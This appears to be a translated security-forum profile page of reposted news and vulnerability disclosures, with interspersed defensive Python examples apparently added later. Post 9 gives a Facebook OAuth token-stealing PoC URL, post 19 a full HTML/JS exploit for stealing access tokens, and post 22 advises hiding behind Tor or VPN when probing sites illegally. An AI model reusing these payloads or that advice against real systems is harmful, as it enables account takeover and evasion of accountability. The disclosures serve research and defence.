Nytro

Administrators - Posts: 18725 - Days Won: 706
Everything posted by Nytro

  1. Spybot +AV 2.1 Beta – A new antivirus with a BitDefender engine
     By Radu FaraVirusi(com) on April 20, 2013
     Spybot was once a well-known name in the anti-malware industry when it came to detecting and removing adware, spyware and trojans. Since then its performance and reputation have declined. Now it is being relaunched in a new version with an antivirus, using the BitDefender engine. The new product is called Spybot +AV 2.1 and is in BETA testing on the official site. Here are the product's features:
     - Antivirus scan (Home Edition and above)
     - Enhanced GUI: a simple view has been added to many components and the number of dialogues has been reduced.
     - Colour coded indicator on dialogue boxes for easy reference
     - MRU Scan: ability to tell Spybot to only scan the Most Recently Used files
     - Added scan mode to only scan for usage tracks
     - Improved rootkit scan, suspicious results can be scanned with our File Scan
     - Multi-core processor support in scan engine (Home Edition and above)
     - Live Protection
     - Internet Security: an integrated proxy server blocks access to suspect URLs (Windows 8 is currently not supported)
     - Improved ‘Protected Repair Environment’ – now has its own easy to use Spybot taskbar
     - Updated Boot CD Creator allows you to create your own Boot CD with Spybot 1 and 2
     - Boot sector scanning
     - Extensive white list for system files, now used in more Spybot components
     - Spybot now prompts you to create a white list when installed on newly commissioned systems
     - French and Italian translations now included by default
     A known issue in this version is the poor antivirus protection on Windows 8. For more information and the download link, go to: Beta Versions | Spybot © ™ - Search & Destroy
     Source: Spybot +AV 2.1 Beta – A new antivirus with a BitDefender engine
  2. C/C++ Manual complet - Herbert Schildt; C++ pentru incepatori, volumele I si II - Liviu Negrescu; Totul despre C si C++ - Kris Jamsa. You can find them in bookshops. Forget the crappy tutorials. Once you have learned the language well, I recommend Secrete C++ - Constantin Galatan.
  3. "Thus, dozens of experts from these institutions will train so that they can cope with a cyber attack." I wonder how many of them will end up becoming "one of ours"?
  4. You can wear out your nerves, end up bug-eyed and lose whole nights staring at a few lines of code trying to find the problem. But it has its advantages too.
  5. Nytro

    Fun stuff

  6. // Edited
  7. There are plenty of people willing, but who is bringing the jobs?
  8. I piss on the foreigners, I don't care about them, I care about "my own".
  9. Another way to hack Facebook accounts using OAuth vulnerability
     In the past few months the white hat hacker 'Nir Goldshlager' reported many critical bugs in Facebook's OAuth mechanism that allowed an attacker to hijack any Facebook account without user interaction. Another hacker, 'Amine Cherrai', reported a new Facebook OAuth flaw whose exploitation is very similar to Nir Goldshlager's findings, but through a new, unpatched route. Before reading further, I would suggest reading the following posts to understand the basic exploitation mechanism:
     - Facebook OAuth flaw allows gaining full control over any Facebook account
     - Facebook hacking accounts using another OAuth vulnerability
     - URL Redirection flaw in Facebook apps push OAuth vulnerability again in action
     Now, if you are aware of the vulnerability used against Facebook OAuth in the redirect_uri parameter of the URL, there is another way, found by Amine Cherrai, to bypass the patch applied by the Facebook security team. He found another file on Facebook that allows redirection in order to steal the access_token of the victim's account, i.e. the Facebook Cross-Domain Messaging helper. Successful exploitation once again allowed the hacker to hijack Facebook accounts using the OAuth flaw.
     Proof of concept: http://facebook.com/dialog/oauth?client_id=350685531728&response_type=token&display=page&redirect_uri=http%3A%2F%2Ftouch.facebook.com%2Fconnect%2Fxd_arbiter.php%3F%23%21%2Fapps%2Fmidnighthack%2F%3F%26origin%3Dhttp%3A%2F%2Ffacebook.com%2F
     Video Demonstration:
     By the way, this bug was closed by the Facebook Security Team a few days back and your social accounts are once again secured, until the next finding!
     Source: Another way to hack Facebook accounts using OAuth vulnerability - Hacking News
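The defensive point in the post above is that a redirect_uri check which allowlists a whole domain hands the attacker every open redirector on that domain, which is why the post's PoC can point at xd_arbiter.php and still pass. What follows is an added example, not code from the post, from Facebook, or from the researchers it names: it contrasts two loose checks (origin-prefix matching and domain-suffix matching) with exact matching of the full registered callback, using the post's PoC redirect_uri as one of the inputs. The registered callback https://example-app.test/oauth/callback, the origin-only prefix ALLOWED_PREFIX and the lookalike host example-app.test.attacker.example are constructed for this example.

```python
from urllib.parse import urlparse, unquote

# Constructed registration data for a hypothetical client: the exact callback
# it registered, and the origin-only prefix that looser implementations store.
REGISTERED_URIS = ["https://example-app.test/oauth/callback"]
ALLOWED_PREFIX = "https://example-app.test"

# The redirect_uri from the post's proof of concept, URL-decoded.
POC_REDIRECT_URI = unquote(
    "http%3A%2F%2Ftouch.facebook.com%2Fconnect%2Fxd_arbiter.php%3F%23%21"
    "%2Fapps%2Fmidnighthack%2F%3F%26origin%3Dhttp%3A%2F%2Ffacebook.com%2F"
)


def naive_prefix_check(candidate, prefix=ALLOWED_PREFIX):
    """Loose check: accept anything that starts with the registered origin.
    A lookalike host such as example-app.test.attacker.example passes."""
    return candidate.startswith(prefix)


def naive_domain_check(candidate, allowed_domain):
    """Loose check: accept any URI whose host is the allowed domain or one of
    its subdomains. Every open redirector on that domain (the post's
    xd_arbiter.php) then becomes a place the token can be sent to."""
    host = urlparse(candidate).hostname or ""
    return host == allowed_domain or host.endswith("." + allowed_domain)


def strict_check(candidate, registered=REGISTERED_URIS):
    """Exact comparison of scheme, host, port, path and query against each
    registered URI; a fragment is never part of a valid redirect_uri."""
    c = urlparse(candidate)
    if c.fragment or not c.scheme or not c.hostname:
        return False
    for r in registered:
        p = urlparse(r)
        if (c.scheme, c.hostname, c.port, c.path, c.query) == (
            p.scheme, p.hostname, p.port, p.path, p.query
        ):
            return True
    return False


if __name__ == "__main__":
    lookalike = "https://example-app.test.attacker.example/oauth/callback"
    print("PoC URI   domain-suffix:", naive_domain_check(POC_REDIRECT_URI, "facebook.com"),
          "strict:", strict_check(POC_REDIRECT_URI))
    print("lookalike origin-prefix:", naive_prefix_check(lookalike),
          "strict:", strict_check(lookalike))
```

The strict check is the one an authorization server should apply: the client registers complete callback URIs and the server compares the whole thing, so neither a second path on the same host nor a host that merely begins with the registered name can receive the token.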
  10. Yes, possibly in 1990. But what did he do to be so "well known"? He was a Project Manager at DARPA, but what did he actually achieve "in the field"?
  11. Google Glass has official specifications, heads to its first customers
     Dorian Prodan - 16 Apr 2013
     After teasing everyone's curiosity with brief details about its smart glasses, Google announced last night that the first Glass units have left the production lines and will be heading to customers in successive stages. To begin with, this only concerns those who attended Google I/O 2012 last year and ordered the product for the sum of 1500 dollars. On this occasion the first official specifications were also published. They do not include the nature of the processor used or the battery capacity; in the latter case Google claims it will offer 24 hours of autonomy.
     Google Glass includes a display with a resolution of 640 x 360 pixels, the manufacturer stating that it offers an experience similar to that of a 25” HD screen viewed from a distance of 2.5 metres. Connectivity includes an 802.11 b/g Wi-Fi adapter, a Bluetooth interface and a Micro USB connector. Internal storage has a capacity of 16GB, of which 12 GB are available to the user. The front camera offers a 5 MP sensor capable of recording 720p video. The audio side has been handled in a somewhat more exotic way, Google Glass using a transducer that transmits sound through the resonance of the bones of the skull.
     As can be seen, the Google Glass glasses do not include a data connection and are in this respect dependent on an Android smartphone or tablet. For this purpose Google has also launched the MyGlass application, which requires Android 4.0.3 or newer and which will mediate the GPS and SMS services. This application is accompanied by the publication of the guide for developing software applications, so that interested programmers can find out what to expect when they get access to the required APIs. An interesting detail is cloud processing, with all applications being mediated by Google's servers so as not to overload the computing power offered by Glass.
     Source: Google Glass has official specifications, heads to its first customers
  12. Hmm: Contest | tresorit
  13. Brute Force Attacks Build WordPress Botnet
     Security experts are warning that an escalating series of online attacks designed to break into poorly-secured WordPress blogs is fueling the growth of an unusually powerful botnet currently made up of more than 90,000 Web servers.
     Over the past week, analysts from a variety of security and networking firms have tracked an alarming uptick in so-called “brute force” password-guessing attacks against Web sites powered by WordPress, perhaps the most popular content management system in use today (this blog also runs WordPress). According to Web site security firm Incapsula, those responsible for this crime campaign are scanning the Internet for WordPress installations, and then attempting to log in to the administrative console at these sites using a custom list of approximately 1,000 of the most commonly-used username and password combinations.
     Incapsula co-founder Marc Gaffan told KrebsOnSecurity that infected sites will be seeded with a backdoor that lets the attackers control the site remotely (the backdoors persist regardless of whether the legitimate site owner subsequently changes his password). The infected sites are then conscripted into the attacking server botnet, and forced to launch password-guessing attacks against other sites running WordPress.
     Gaffan said the traffic being generated by all this activity is wreaking havoc for some Web hosting firms. “It’s hurting the service providers the most, not just with incoming traffic,” Gaffan said. “But as soon as those servers get hacked, they are now bombarding other servers with attack traffic. We’re talking about Web servers, not home PCs. PCs may be connected to the Internet with a 10 megabit or 20 megabit line, but the best hosting providers have essentially unlimited Internet bandwidth. We think they’re building an army of zombies, big servers to bombard other targets for a bigger cause down the road.”
     Indeed, this was the message driven home Thursday in a blog post from Houston, Texas based HostGator, one of the largest hosting providers in the United States. The company’s data suggests that the botnet of infected WordPress installations now includes more than 90,000 compromised sites. “As I type these words, there is an on-going and highly-distributed, global attack on WordPress installations across virtually every web host in existence,” wrote HostGator’s Sean Valant. “This attack is well organized and again very, very distributed; we have seen over 90,000 IP addresses involved in this attack.”
     That assessment was echoed in a blog post Thursday by CloudFlare, a content delivery network based in San Francisco. Cloudflare CEO Matthew Prince said the tactics employed in this attack are similar to those used by criminals to build the so-called itsoknoproblembro/Brobot botnet which, in the Fall of 2012, was responsible for a series of rather large cyber attacks against the largest US financial institutions. “One of the concerns of an attack like this is that the attacker is using a relatively weak botnet of home PCs in order to build a much larger botnet of beefy servers in preparation for a future attack,” Prince wrote. “These larger machines can cause much more damage in DDoS attacks because the servers have large network connections and are capable of generating significant amounts of traffic.”
     HostGator’s Valant urged WordPress administrators to change their passwords to something that meets the security requirements specified on the WordPress website. These requirements are fairly typical of a secure password: upper and lowercase letters, at least eight characters long, and including “special” characters (^%$#&@*). For more on picking strong passwords, see this tutorial. Users can also restrict access to wp-admin so that it is only reachable from specific IP addresses. Also, WordPress users can take advantage of a third-party plugin from Duo Security, which enables secure logins using one-time codes pushed via text message or an associated mobile app.
     Matthew Mullenweg, the founding developer of WordPress, suggests site administrators choose a username that is something other than “admin”. In addition, he urged WordPress.com-hosted blogs to turn on two-factor authentication, and to verify that the site is running the latest version of WordPress. “Do this and you’ll be ahead of 99% of sites out there and probably never have a problem,” Mullenweg wrote.
     Daniel Cid, chief technology officer of Sucuri Security, a company that helps site owners prevent and recover from security breaches, said his team isn’t seeing infected sites being used to attack others; according to Cid, most of the password brute-forcing is being conducted by desktop systems under the attackers’ control. “We saw a big increase in the number of brute force attacks (almost tripled) since previous month’s average,” Cid wrote in an instant message interview. “However, at least from our data, they are not re-using the compromised sites to build a botnet to scan others. I assume that is speculation. On the sites we looked [at] that were hacked, the attackers injected backdoors and malware on them,” including the Blackhole Exploit Kit.
     Cid also shared a copy of the username/password list that the attackers have been using for the brute-forcing. “The brute force attacks do not seem to be coming from servers, but from desktops,” Cid said. “However, this is still very early, since they are injecting backdoors (a variation of the Filesman backdoor) they can later use the sites to inject malware or even create a botnet and brute force other sites.”
     According to Sucuri, WordPress administrators who have been hacked should strongly consider taking the following steps to evict the intruders and infections:
     - Log in to the administrative panel and remove any unfamiliar admin users.
     - Change all passwords for all admin users (and make sure all legitimate accounts are protected with strong passwords this time).
     - Update the secret keys inside WordPress (otherwise any rogue admin user can remain logged in).
     - Reinstall WordPress from scratch or revert to a known, safe backup.
     Update, 3:05 p.m. ET: Corrected Gaffan’s title. Update, 6:29 p.m. ET: Added quotes and tips from Sucuri Security. Update, Apr. 13, 2013, 12:14 p.m. ET: Added comments from Mullenweg.
     Source: Brute Force Attacks Build WordPress Botnet — Krebs on Security
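Two things in the article above are directly observable in a site's own access log: the attack is a stream of POSTs to the WordPress login page, and the disagreement between Incapsula and Sucuri comes down to whether the attempts arrive from a few desktops or from tens of thousands of servers. What follows is an added example, not code from the article or from any of the firms it quotes: it parses combined-format access log lines, flags any source address that produces a burst of failed logins inside a sliding window, and counts how many distinct addresses are failing, which is the number that separates one noisy host from a distributed campaign. The log lines, addresses and thresholds are constructed for this example.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Combined log format: ip ident user [ts] "METHOD path proto" status size "ref" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) '
)

# Constructed sample: one noisy source, one legitimate admin, one low-rate source.
SAMPLE_LOG = """\
198.51.100.23 - - [12/Apr/2013:10:00:01 +0000] "POST /wp-login.php HTTP/1.1" 200 3452 "-" "Mozilla/5.0"
203.0.113.7 - - [12/Apr/2013:10:00:03 +0000] "GET /wp-login.php HTTP/1.1" 200 2311 "-" "Mozilla/5.0"
198.51.100.23 - - [12/Apr/2013:10:00:05 +0000] "POST /wp-login.php HTTP/1.1" 200 3452 "-" "Mozilla/5.0"
198.51.100.23 - - [12/Apr/2013:10:00:09 +0000] "POST /wp-login.php HTTP/1.1" 200 3452 "-" "Mozilla/5.0"
203.0.113.7 - - [12/Apr/2013:10:00:12 +0000] "POST /wp-login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"
198.51.100.23 - - [12/Apr/2013:10:00:14 +0000] "POST /wp-login.php HTTP/1.1" 200 3452 "-" "Mozilla/5.0"
192.0.2.9 - - [12/Apr/2013:10:00:20 +0000] "POST /wp-login.php HTTP/1.1" 200 3452 "-" "Mozilla/5.0"
198.51.100.23 - - [12/Apr/2013:10:00:21 +0000] "POST /wp-login.php HTTP/1.1" 200 3452 "-" "Mozilla/5.0"
203.0.113.7 - - [12/Apr/2013:10:00:30 +0000] "GET /wp-admin/ HTTP/1.1" 200 9120 "-" "Mozilla/5.0"
198.51.100.23 - - [12/Apr/2013:10:00:31 +0000] "POST /wp-login.php HTTP/1.1" 200 3452 "-" "Mozilla/5.0"
"""


def parse_line(line):
    """Return a dict for one combined-format line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    return {
        "ip": m.group("ip"),
        "ts": datetime.strptime(m.group("ts"), "%d/%b/%Y:%H:%M:%S %z"),
        "method": m.group("method"),
        "path": m.group("path").split("?", 1)[0],
        "status": int(m.group("status")),
    }


def failed_login_events(lines):
    """Yield (ip, ts) for POSTs to wp-login.php answered with 200.
    WordPress re-renders the login form with a 200 on a wrong password and
    answers a successful login with a 302 redirect, so the 200s are the
    failed attempts."""
    for line in lines:
        rec = parse_line(line)
        if (rec and rec["method"] == "POST"
                and rec["path"].endswith("/wp-login.php") and rec["status"] == 200):
            yield rec["ip"], rec["ts"]


def brute_force_sources(lines, threshold=5, window=timedelta(minutes=5)):
    """Return {ip: total_failed_attempts} for every source that produced at
    least `threshold` failed logins inside some window of length `window`."""
    per_ip = defaultdict(list)
    for ip, ts in failed_login_events(lines):
        per_ip[ip].append(ts)
    flagged = {}
    for ip, stamps in per_ip.items():
        stamps.sort()
        start = 0
        for end in range(len(stamps)):
            while stamps[end] - stamps[start] > window:
                start += 1          # slide the window forward
            if end - start + 1 >= threshold:
                flagged[ip] = len(stamps)
                break
    return flagged


def distinct_failed_sources(lines):
    """Number of distinct addresses with at least one failed login. Many
    addresses each at a low rate is the distributed pattern the article
    describes, which a per-address threshold alone will not catch."""
    return len({ip for ip, _ in failed_login_events(lines)})


if __name__ == "__main__":
    lines = SAMPLE_LOG.splitlines()
    print("flagged:", brute_force_sources(lines))
    print("distinct failing sources:", distinct_failed_sources(lines))
```

On the sample, the per-address rule flags only 198.51.100.23; 192.0.2.9 stays under the threshold and would only show up in the distinct-source count, which is the figure to alert on when it jumps well above the site's normal baseline.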
  14. Microsoft: Hold Off Installing MS13-036
     Microsoft is urging users who haven’t installed it yet to hold off on MS13-036, a security update that the company released earlier this week to fix a dangerous security bug in its Windows operating system. The advice comes in response to a spike in complaints from Windows users who found their machines unbootable after applying the update.
     The MS13-036 update, first released on Tuesday, fixes four vulnerabilities in the Windows kernel-mode driver. In an advisory released April 9, the company said it had removed the download links to the patch while it investigates the source of the problem: “Microsoft is investigating behavior wherein systems may fail to recover from a reboot or applications fails to load after security update 2823324 is applied. Microsoft recommends that customers uninstall this update. As an added precaution, Microsoft has removed the download links to the 2823324 update while we investigate.”
     The problems with the patch appear to be centered around Windows 7 and certain applications on Windows 7, such as Kaspersky Anti-Virus. Microsoft has issued instructions on how to uninstall this update in the “resolution” section of this advisory.
     Source: Microsoft: Hold Off Installing MS13-036 — Krebs on Security
  15. Plesk Panel 11.0.9 privilege escalation vulnerabilities
     Original Release date: 10 Apr 2013 | Last revised: 10 Apr 2013
     Overview
     Plesk Panel 11.0.9 and possibly earlier versions contain multiple privilege escalation vulnerabilities.
     Description
     Plesk Panel contains multiple privilege escalation vulnerabilities which may allow an attacker to run arbitrary code as the root user.
     Special-case rules in Plesk's custom version of Apache suexec allow execution of arbitrary code as an arbitrary user id above a certain minimum value. In addition, several administrative or system accounts have a user ID above this minimum. Plesk's /usr/sbin/suexec binary (the binary may be present in additional locations, always with suexec in the filename) always allows the binary 'cgi-wrapper', bypassing restrictions on the ownership of the file to be called. Since cgi-wrapper's function is to execute a PHP script based on environment variables (and suexec does not sanitize these environment variables), this allows execution of arbitrary PHP code with a user id above a minimum user ID value that is hardcoded in the suid binary. CVE-2013-0132
     The program /usr/local/psa/admin/sbin/wrapper allows the user psaadm to execute various administrative scripts with root privileges. Some of these scripts call external programs without specifying the full path. By specifying a malicious PATH environment variable, an attacker can cause the administrative scripts to call his own program instead of the intended system program. CVE-2013-0133
     Impact
     An authenticated attacker may be able to escalate their privileges to root, allowing them to run arbitrary code as the root user.
     Solution
     We are currently unaware of a practical solution to this problem.
     Source: Vulnerability Note VU#310500 - Plesk Panel 11.0.9 privilege escalation vulnerabilities
  16. Remotely Hijacking an Aircraft
     There is a lot of buzz on the Internet about a talk at the Hack-in-the-Box conference by Hugo Teso, who claims he can hack into and remotely control an airplane's avionics. He even wrote an Android app to do it. I honestly can't tell how real this is, and how much of it is the unique configuration of simulators he tested this on. On the one hand, it can't possibly be true that an aircraft avionics computer accepts outside commands. On the other hand, we've seen lots of security vulnerabilities that seem impossible to be true. Right now, I'm skeptical.
     EDITED TO ADD (4/12): Three good refutations.
     Source: Schneier on Security: Remotely Hijacking an Aircraft
  17. Video Tutorial: Installing Kali Linux on Virtual Box
     Author: Jeremy Druin
     Video Release Announcements: Twitter @webpwnized
     Title: Installing Kali Linux on Virtual Box with Nessus and Metasploit
     Link: This video is from the April 2013 workshop of the KY ISSA covering the installation of Kali Linux 1.01 on Virtual Box. Please see the notes below the video.
     Notes:
     - Kali version 1.01 64-bit was used in making the video, but the latest version can be downloaded from Downloads | Kali Linux.
     - Documentation on installing and using Kali is available at Kali Linux Official Documentation | Kali Linux.
     - The Kali guest virtual machine is configured with 2 GB RAM, a 128 GB hard disk drive, and 128 MB of video memory.
     - A written tutorial on installing the Virtual Box guest additions can be found at Kali Linux Virtual Box guest | Kali Linux Official Documentation.
     - The command used in the video to install the packages supporting the Virtual Box guest additions is: apt-get update && apt-get install -y linux-headers-$(uname -r) dkms. This includes the installation of the dynamic kernel module support (dkms) package, which is needed on some systems to compile the Virtual Box guest addition drivers.
     - The version of Nessus used in the demo is Debian 6.0 (64 bits): Nessus-5.0.3-debian6_amd64.deb from the Nessus website.
     Source: https://community.rapid7.com/community/infosec/blog/2013/04/10/video-tutorial-installing-kali-linux-on-virtual-box
  18. Kaspersky Internet Security 2013 – a one-year FREE licence
     By Radu FaraVirusi(com) on April 14, 2013
     If you want to test the new 2013 version of Kaspersky Internet Security, you can now do so free of charge for a whole year. How do you obtain the FREE licence? Go to the promotional site and download the product: Kaspersky Lab
  19. Stealing Facebook Access Tokens with a Double Submit
     After the wave of OAuth bugs reported recently, it’s my turn to present a just as serious (but slightly less complicated) issue.
     On the Facebook App Center, we have links to numerous different apps. Some have a “Go to App” button, for apps embedded within Facebook, and others have a “Visit Website” button, for sites which connect with Facebook. The “Visit Website” button submits a POST request to uiserver.php, which generates an access token and redirects you to the site. The form is interesting in that it doesn’t present a permissions dialog (like you would have when requesting permissions via /dialog/oauth). This is presumably because the request has to be initiated by the user (due to the presence of a CSRF token), and because the permissions required are listed underneath the button.
     During testing, I noticed that omitting the CSRF token (fb_dtsg) and orig/new_perms generates a 500 error and doesn’t redirect you. This is expected behaviour. However, in the background, an access token is generated. Refreshing the app’s page in the App Center and hovering over “Visit Website” shows that it is now a link to the site, with your access token included.
     Using this bug, we can double-submit the permissions form to gain a valid access token. The first request is discarded - the token is generated in the background. The second request is sent after a specific interval (in my PoC I’ve chosen five seconds to be safe, but a wait of one second would suffice), which picks up the already generated token and redirects the user.
     The awesome thing about this bug is that we don’t need to piggy-back off an already existing app’s permissions like in some of the other bugs; we can specify whatever ones we want (including any of the extended permissions). When the user is sent to the final page, a snippet of their FB inbox is displayed, sweet! In a real-world example, the inbox would obviously not be presented, but logged.
     Full PoC

        <!-- index.html -->
        <html>
        <head></head>
        <body>
        <h3>Facebook Auth PoC - Wait 5 Seconds</h3>
        <!-- Load the form first -->
        <div id="iframe-wrap">
        <iframe src="frame.html" style="visibility:hidden;"></iframe>
        </div>
        <!-- Load the second after 5 seconds -->
        <script>
        setTimeout(function(){
        document.getElementById('iframe-wrap').innerHTML = '<iframe src="frame.html" style="width:800px;height:500px;"></iframe>';
        }, 5000);
        </script>
        </body>
        </html>

        <!-- frame.html -->
        <form action="https://www.facebook.com/connect/uiserver.php" method="POST" id="fb">
        <input type="hidden" name="perms" value="email,user_likes,publish_actions,read_mailbox">
        <input type="hidden" name="dubstep" value="1">
        <input type="hidden" name="new_user_session" value="1">
        <input type="hidden" name="app_id" value="359849714135684">
        <input type="hidden" name="redirect_uri" value="https://fin1te.net/fb-poc/fb.php">
        <input type="hidden" name="response_type" value="code">
        <input type="hidden" name="from_post" value="1">
        <input type="hidden" name="__uiserv_method" value="permissions.request">
        <input type="hidden" name="grant_clicked" value="Visit Website">
        </form>
        <script>document.getElementById('fb').submit();</script>

     Fix
     Facebook has fixed this issue by redirecting any calls to uiserver.php without the correct tokens to invalid_request.php.
     Timeline
     4th April 2013 - Issue Reported
     8th April 2013 - Acknowledgment of Report
     9th April 2013 - Issue Fixed
     Source: fin1te - Stealing Facebook Access Tokens with a Double Submit
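The root cause in the post above is ordering: the endpoint created the grant (a state change) before it validated the CSRF token and the required fields, so a second, equally malformed submit could collect what the first one left behind. What follows is an added example, not code from the post or from Facebook: it models that ordering as a small request handler, next to the hardened version that does what the post's Fix section describes (reject to invalid_request.php before touching any state), and replays the PoC's two submits against both. The handler signature, the in-memory grant store, the session values and the redirect target https://app.example/cb are constructed for this example; app_id is the one from the PoC.

```python
import secrets

INVALID_REQUEST = "/invalid_request.php"   # the fix's redirect target, as named in the post


def issue_token():
    """Constructed stand-in for the real access-token generator."""
    return "tok_" + secrets.token_hex(8)


def _bad_request(session, form):
    """The checks the post says the endpoint performs: CSRF token and perms fields."""
    return form.get("fb_dtsg") != session["fb_dtsg"] or "new_perms" not in form


def vulnerable_uiserver(grants, session, form):
    """Hypothetical model of the order of operations the post describes.
    `grants` maps (user, app_id) -> token and persists across requests."""
    key = (session["user"], form.get("app_id"))
    if key in grants:
        # An earlier submit already created a grant: hand it out straight away.
        return 302, f'{form.get("redirect_uri")}#access_token={grants[key]}'
    grants[key] = issue_token()            # state change first ...
    if _bad_request(session, form):        # ... validation second: too late
        return 500, None
    return 302, f'{form.get("redirect_uri")}#access_token={grants[key]}'


def fixed_uiserver(grants, session, form):
    """Hardened order: validate before any state change, and send bad
    requests to invalid_request.php as the post's Fix section describes."""
    if _bad_request(session, form):
        return 302, INVALID_REQUEST
    key = (session["user"], form.get("app_id"))
    if key not in grants:
        grants[key] = issue_token()
    return 302, f'{form.get("redirect_uri")}#access_token={grants[key]}'


def double_submit(handler):
    """Replay the post's PoC: two submits of the same form, both lacking
    fb_dtsg and new_perms. Returns both responses and the grant store."""
    grants = {}
    session = {"user": "victim", "fb_dtsg": "csrf-" + secrets.token_hex(4)}
    form = {"app_id": "359849714135684", "perms": "email,read_mailbox",
            "redirect_uri": "https://app.example/cb"}
    first = handler(grants, session, dict(form))
    second = handler(grants, session, dict(form))
    return first, second, grants


if __name__ == "__main__":
    for handler in (vulnerable_uiserver, fixed_uiserver):
        print(handler.__name__, double_submit(handler))
```

Against the vulnerable handler the first submit returns 500 yet leaves a token in the store and the second submit walks away with it; against the fixed handler both submits are bounced to invalid_request.php and the store stays empty, while a properly formed submit still succeeds.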
  20. INDECT – the project that takes cyber-espionage to the extreme, or the salvation of Europe's citizens?
     Published by Andrei Avădănei, 14 Apr 2013 at 10:00 am
     INDECT (Intelligent information system supporting observation, searching and detection for security of citizens in urban environment) is a research project involving researchers and technical people from across Europe whose aim is to develop solutions for automating threat detection. The primary objectives they declare include developing very powerful algorithms that imitate human decision-making in an attempt to combat terrorism and other criminal activities, such as human trafficking, child pornography, the detection of dangerous situations (for example, thefts) or the detection of dangerous objects (knives, guns) in public spaces. They claim that such mechanisms are extremely important for public safety.
     The technologies developed by INDECT are divided into three categories:
     - Intelligent threat monitoring
     - Detection of IT threats
     - Protection of data and privacy
     INDECT and Anonymous-brand cyber-espionage
     The project carries weight thanks to the big names involved, both renowned European universities and various state police bodies from several countries of the continent. Apparently, like any other similar initiative, it all comes in the context of supporting the citizen, except that a recording made by the Anonymous group presents the INDECT project from a worrying perspective, one that makes me, at least, think a few times about whether or not this project is beneficial to humanity. I recommend you watch the video to the end.
     Do we really need something like this? Honestly, I don't think so. But since the desire for control, to have everything in hand and manipulable, to have the biggest "things" and to conquer new territories and frontiers has always been in our blood, the alternatives for doing this by force, weapons, have arrived indirectly as well.
     Can we stop such a project? Unlikely. Even if this version of the project is shut down, it will surely be continued in one form or another, in one environment or another, because once the bar has been raised it is impossible to go back. Humanity boasts about developing some of the most lethal weapons of mass destruction, which have passed through every human filter, and there are states that talk about this subject the way we programmers would brag about our latest project. If those toys got through, what or who can stop these?
     And yet? History also shows us that although many technologies have been developed over time which, if they were to fall into the hands of the general public, would be an immediate catastrophe, these have been extremely well protected and used almost responsibly, in the interest of those who owned them, interests too unimportant to ordinary people. Here I am thinking of remote surveillance technologies, geolocation, mechanisms for monitoring Internet or mobile phone traffic, and so on. Or at least the information has not been made public. Perhaps INDECT will end up the same way.
     What can we do? Look for alternatives. Or wait. Or hide under a rock. None of these options will stop new technologies from flourishing and coming to control us more subtly but more effectively. Personally, between an intelligent cyber war and one with weapons of mass destruction, I prefer the first option, although most likely immediately after the destabilisation of that infrastructure everything would collapse and we would end up in the second situation anyway. But that subject is for a blog in a different niche.
     Source: INDECT – the project that takes cyber-espionage to the extreme, or the salvation of Europe's citizens? | WORLDIT
  21. We will maintain here a list of the sites that have a bug bounty programme.
     - Google http://www.google.com/about/appsecurity/reward-program/
     - Facebook https://www.facebook.com/whitehat/bounty
     - Mozilla http://www.mozilla.org/security/bug-bounty.html
     - Paypal https://www.paypal.com/us/webapps/mpp/security/reporting-security-issues
     - Secunia http://secunia.com/community/research/svcrp/
     - Etsy http://codeascraft.etsy.com/2012/09/11/announcing-the-etsy-security-bug-bounty-program/
     - Barracuda http://www.barracudalabs.com/bugbounty/
     ----------------------------------------------------------------------------------------------
     Sites that will credit the people who report vulnerabilities to them:
     - Adobe http://www.adobe.com/support/security/alertus.html
     - Twitter https://twitter.com/about/security
     - EBay http://pages.ebay.com/securitycenter/ResearchersAcknowledgement.html
     - Microsoft http://technet.microsoft.com/en-us/security/ff852094.aspx
     - Apple http://support.apple.com/kb/HT1318
     - Dropbox https://www.dropbox.com/security
     - Reddit http://code.reddit.com/wiki/help/whitehat
     - Github https://help.github.com/articles/responsible-disclosure-of-security-vulnerabilities
     - Ifixit http://www.ifixit.com/Info/responsible_disclosure
     - 37 Signals http://37signals.com/security-response
     - Twilio http://www.twilio.com/blog/2012/03/reporting-security-vulnerabilities.html
     - Constant Contact http://www.constantcontact.com/about-constant-contact/security/report-vulnerability.jsp
     - Engine Yard http://www.engineyard.com/legal/responsible-disclosure-policy
     - Lastpass https://lastpass.com/support_security.php
     - RedHat https://access.redhat.com/knowledge/articles/66234
     - Acquia https://www.acquia.com/how-report-security-issue
     - Zynga http://company.zynga.com/security/whitehats
     - Owncloud http://owncloud.org/security/policy
     - Tuenti http://corporate.tuenti.com/en/dev/hall-of-fame
     - Soundcloud http://help.soundcloud.com/customer/portal/articles/439715-responsible-disclosure
     - Nokia Siemens Networks http://www.nokiasiemensnetworks.com/about-us/responsible-disclosure
     - Yandex Bug Bounty http://company.yandex.com/security/hall-of-fame.xml
     Original list: List of Bug Bounty program for PenTesters and Ethical Hackers - E Hacker News
     The list is being updated. If you have something to add, post in this topic and we will update it here as well.
  22. RST is a community with a great many people passionate about discovering security problems, especially in web applications. Since there are many people who enjoy looking for security problems, why do it for free and not for money?
     Bug Bounty
     A Bug Bounty is a programme for rewarding IT security enthusiasts who responsibly report a vulnerability, used by several companies to prevent the problems that could arise through the exploitation of vulnerabilities discovered in their own services by their users. There are a few large companies (Google, Facebook...) that have decided to start such a programme. The reward can be a cash prize, but also a mention of the discoverers in a "Hall of fame", or other prizes: T-shirts, licences for software products etc. We will maintain a list of these sites here: https://rstforums.com/forum/67995-informatii-despre-programele-bug-bounty.rst If you have information about new sites enrolled in such a programme, or about the ones already listed, post there so that the list stays up to date. For enthusiasts, the advantage is the prizes they can receive by reporting these vulnerabilities, and for companies the advantage is getting those security problems fixed.
     But what if I found a problem on a site that doesn't have a Bug Bounty programme?
     Of course, you can also look for security problems on sites that do not have such a programme, but you are heading towards illegality. Not all companies consider the discovery and reporting of a security problem a privilege, so even if you report a problem you have found, you can get into legal trouble, especially if you are into big, government sites: NASA and others... But why risk prison when you can be rewarded for reporting a vulnerability? If you still want to risk your freedom, at least do it professionally: Tor, VPN or other protective measures, and be very careful about when/how/where you "report" the problem you discovered!
     What is this category?
     The category is intended for people who discover security problems on sites with a bug bounty programme. If the problem is found in a service that does not offer a reward for reporting vulnerabilities, the details (from minimal information to full disclosure) can be posted in the ShowOff category. Here we will post the problems discovered on these sites as well as the prizes received, or other information that can help and encourage others to get involved in such activities.
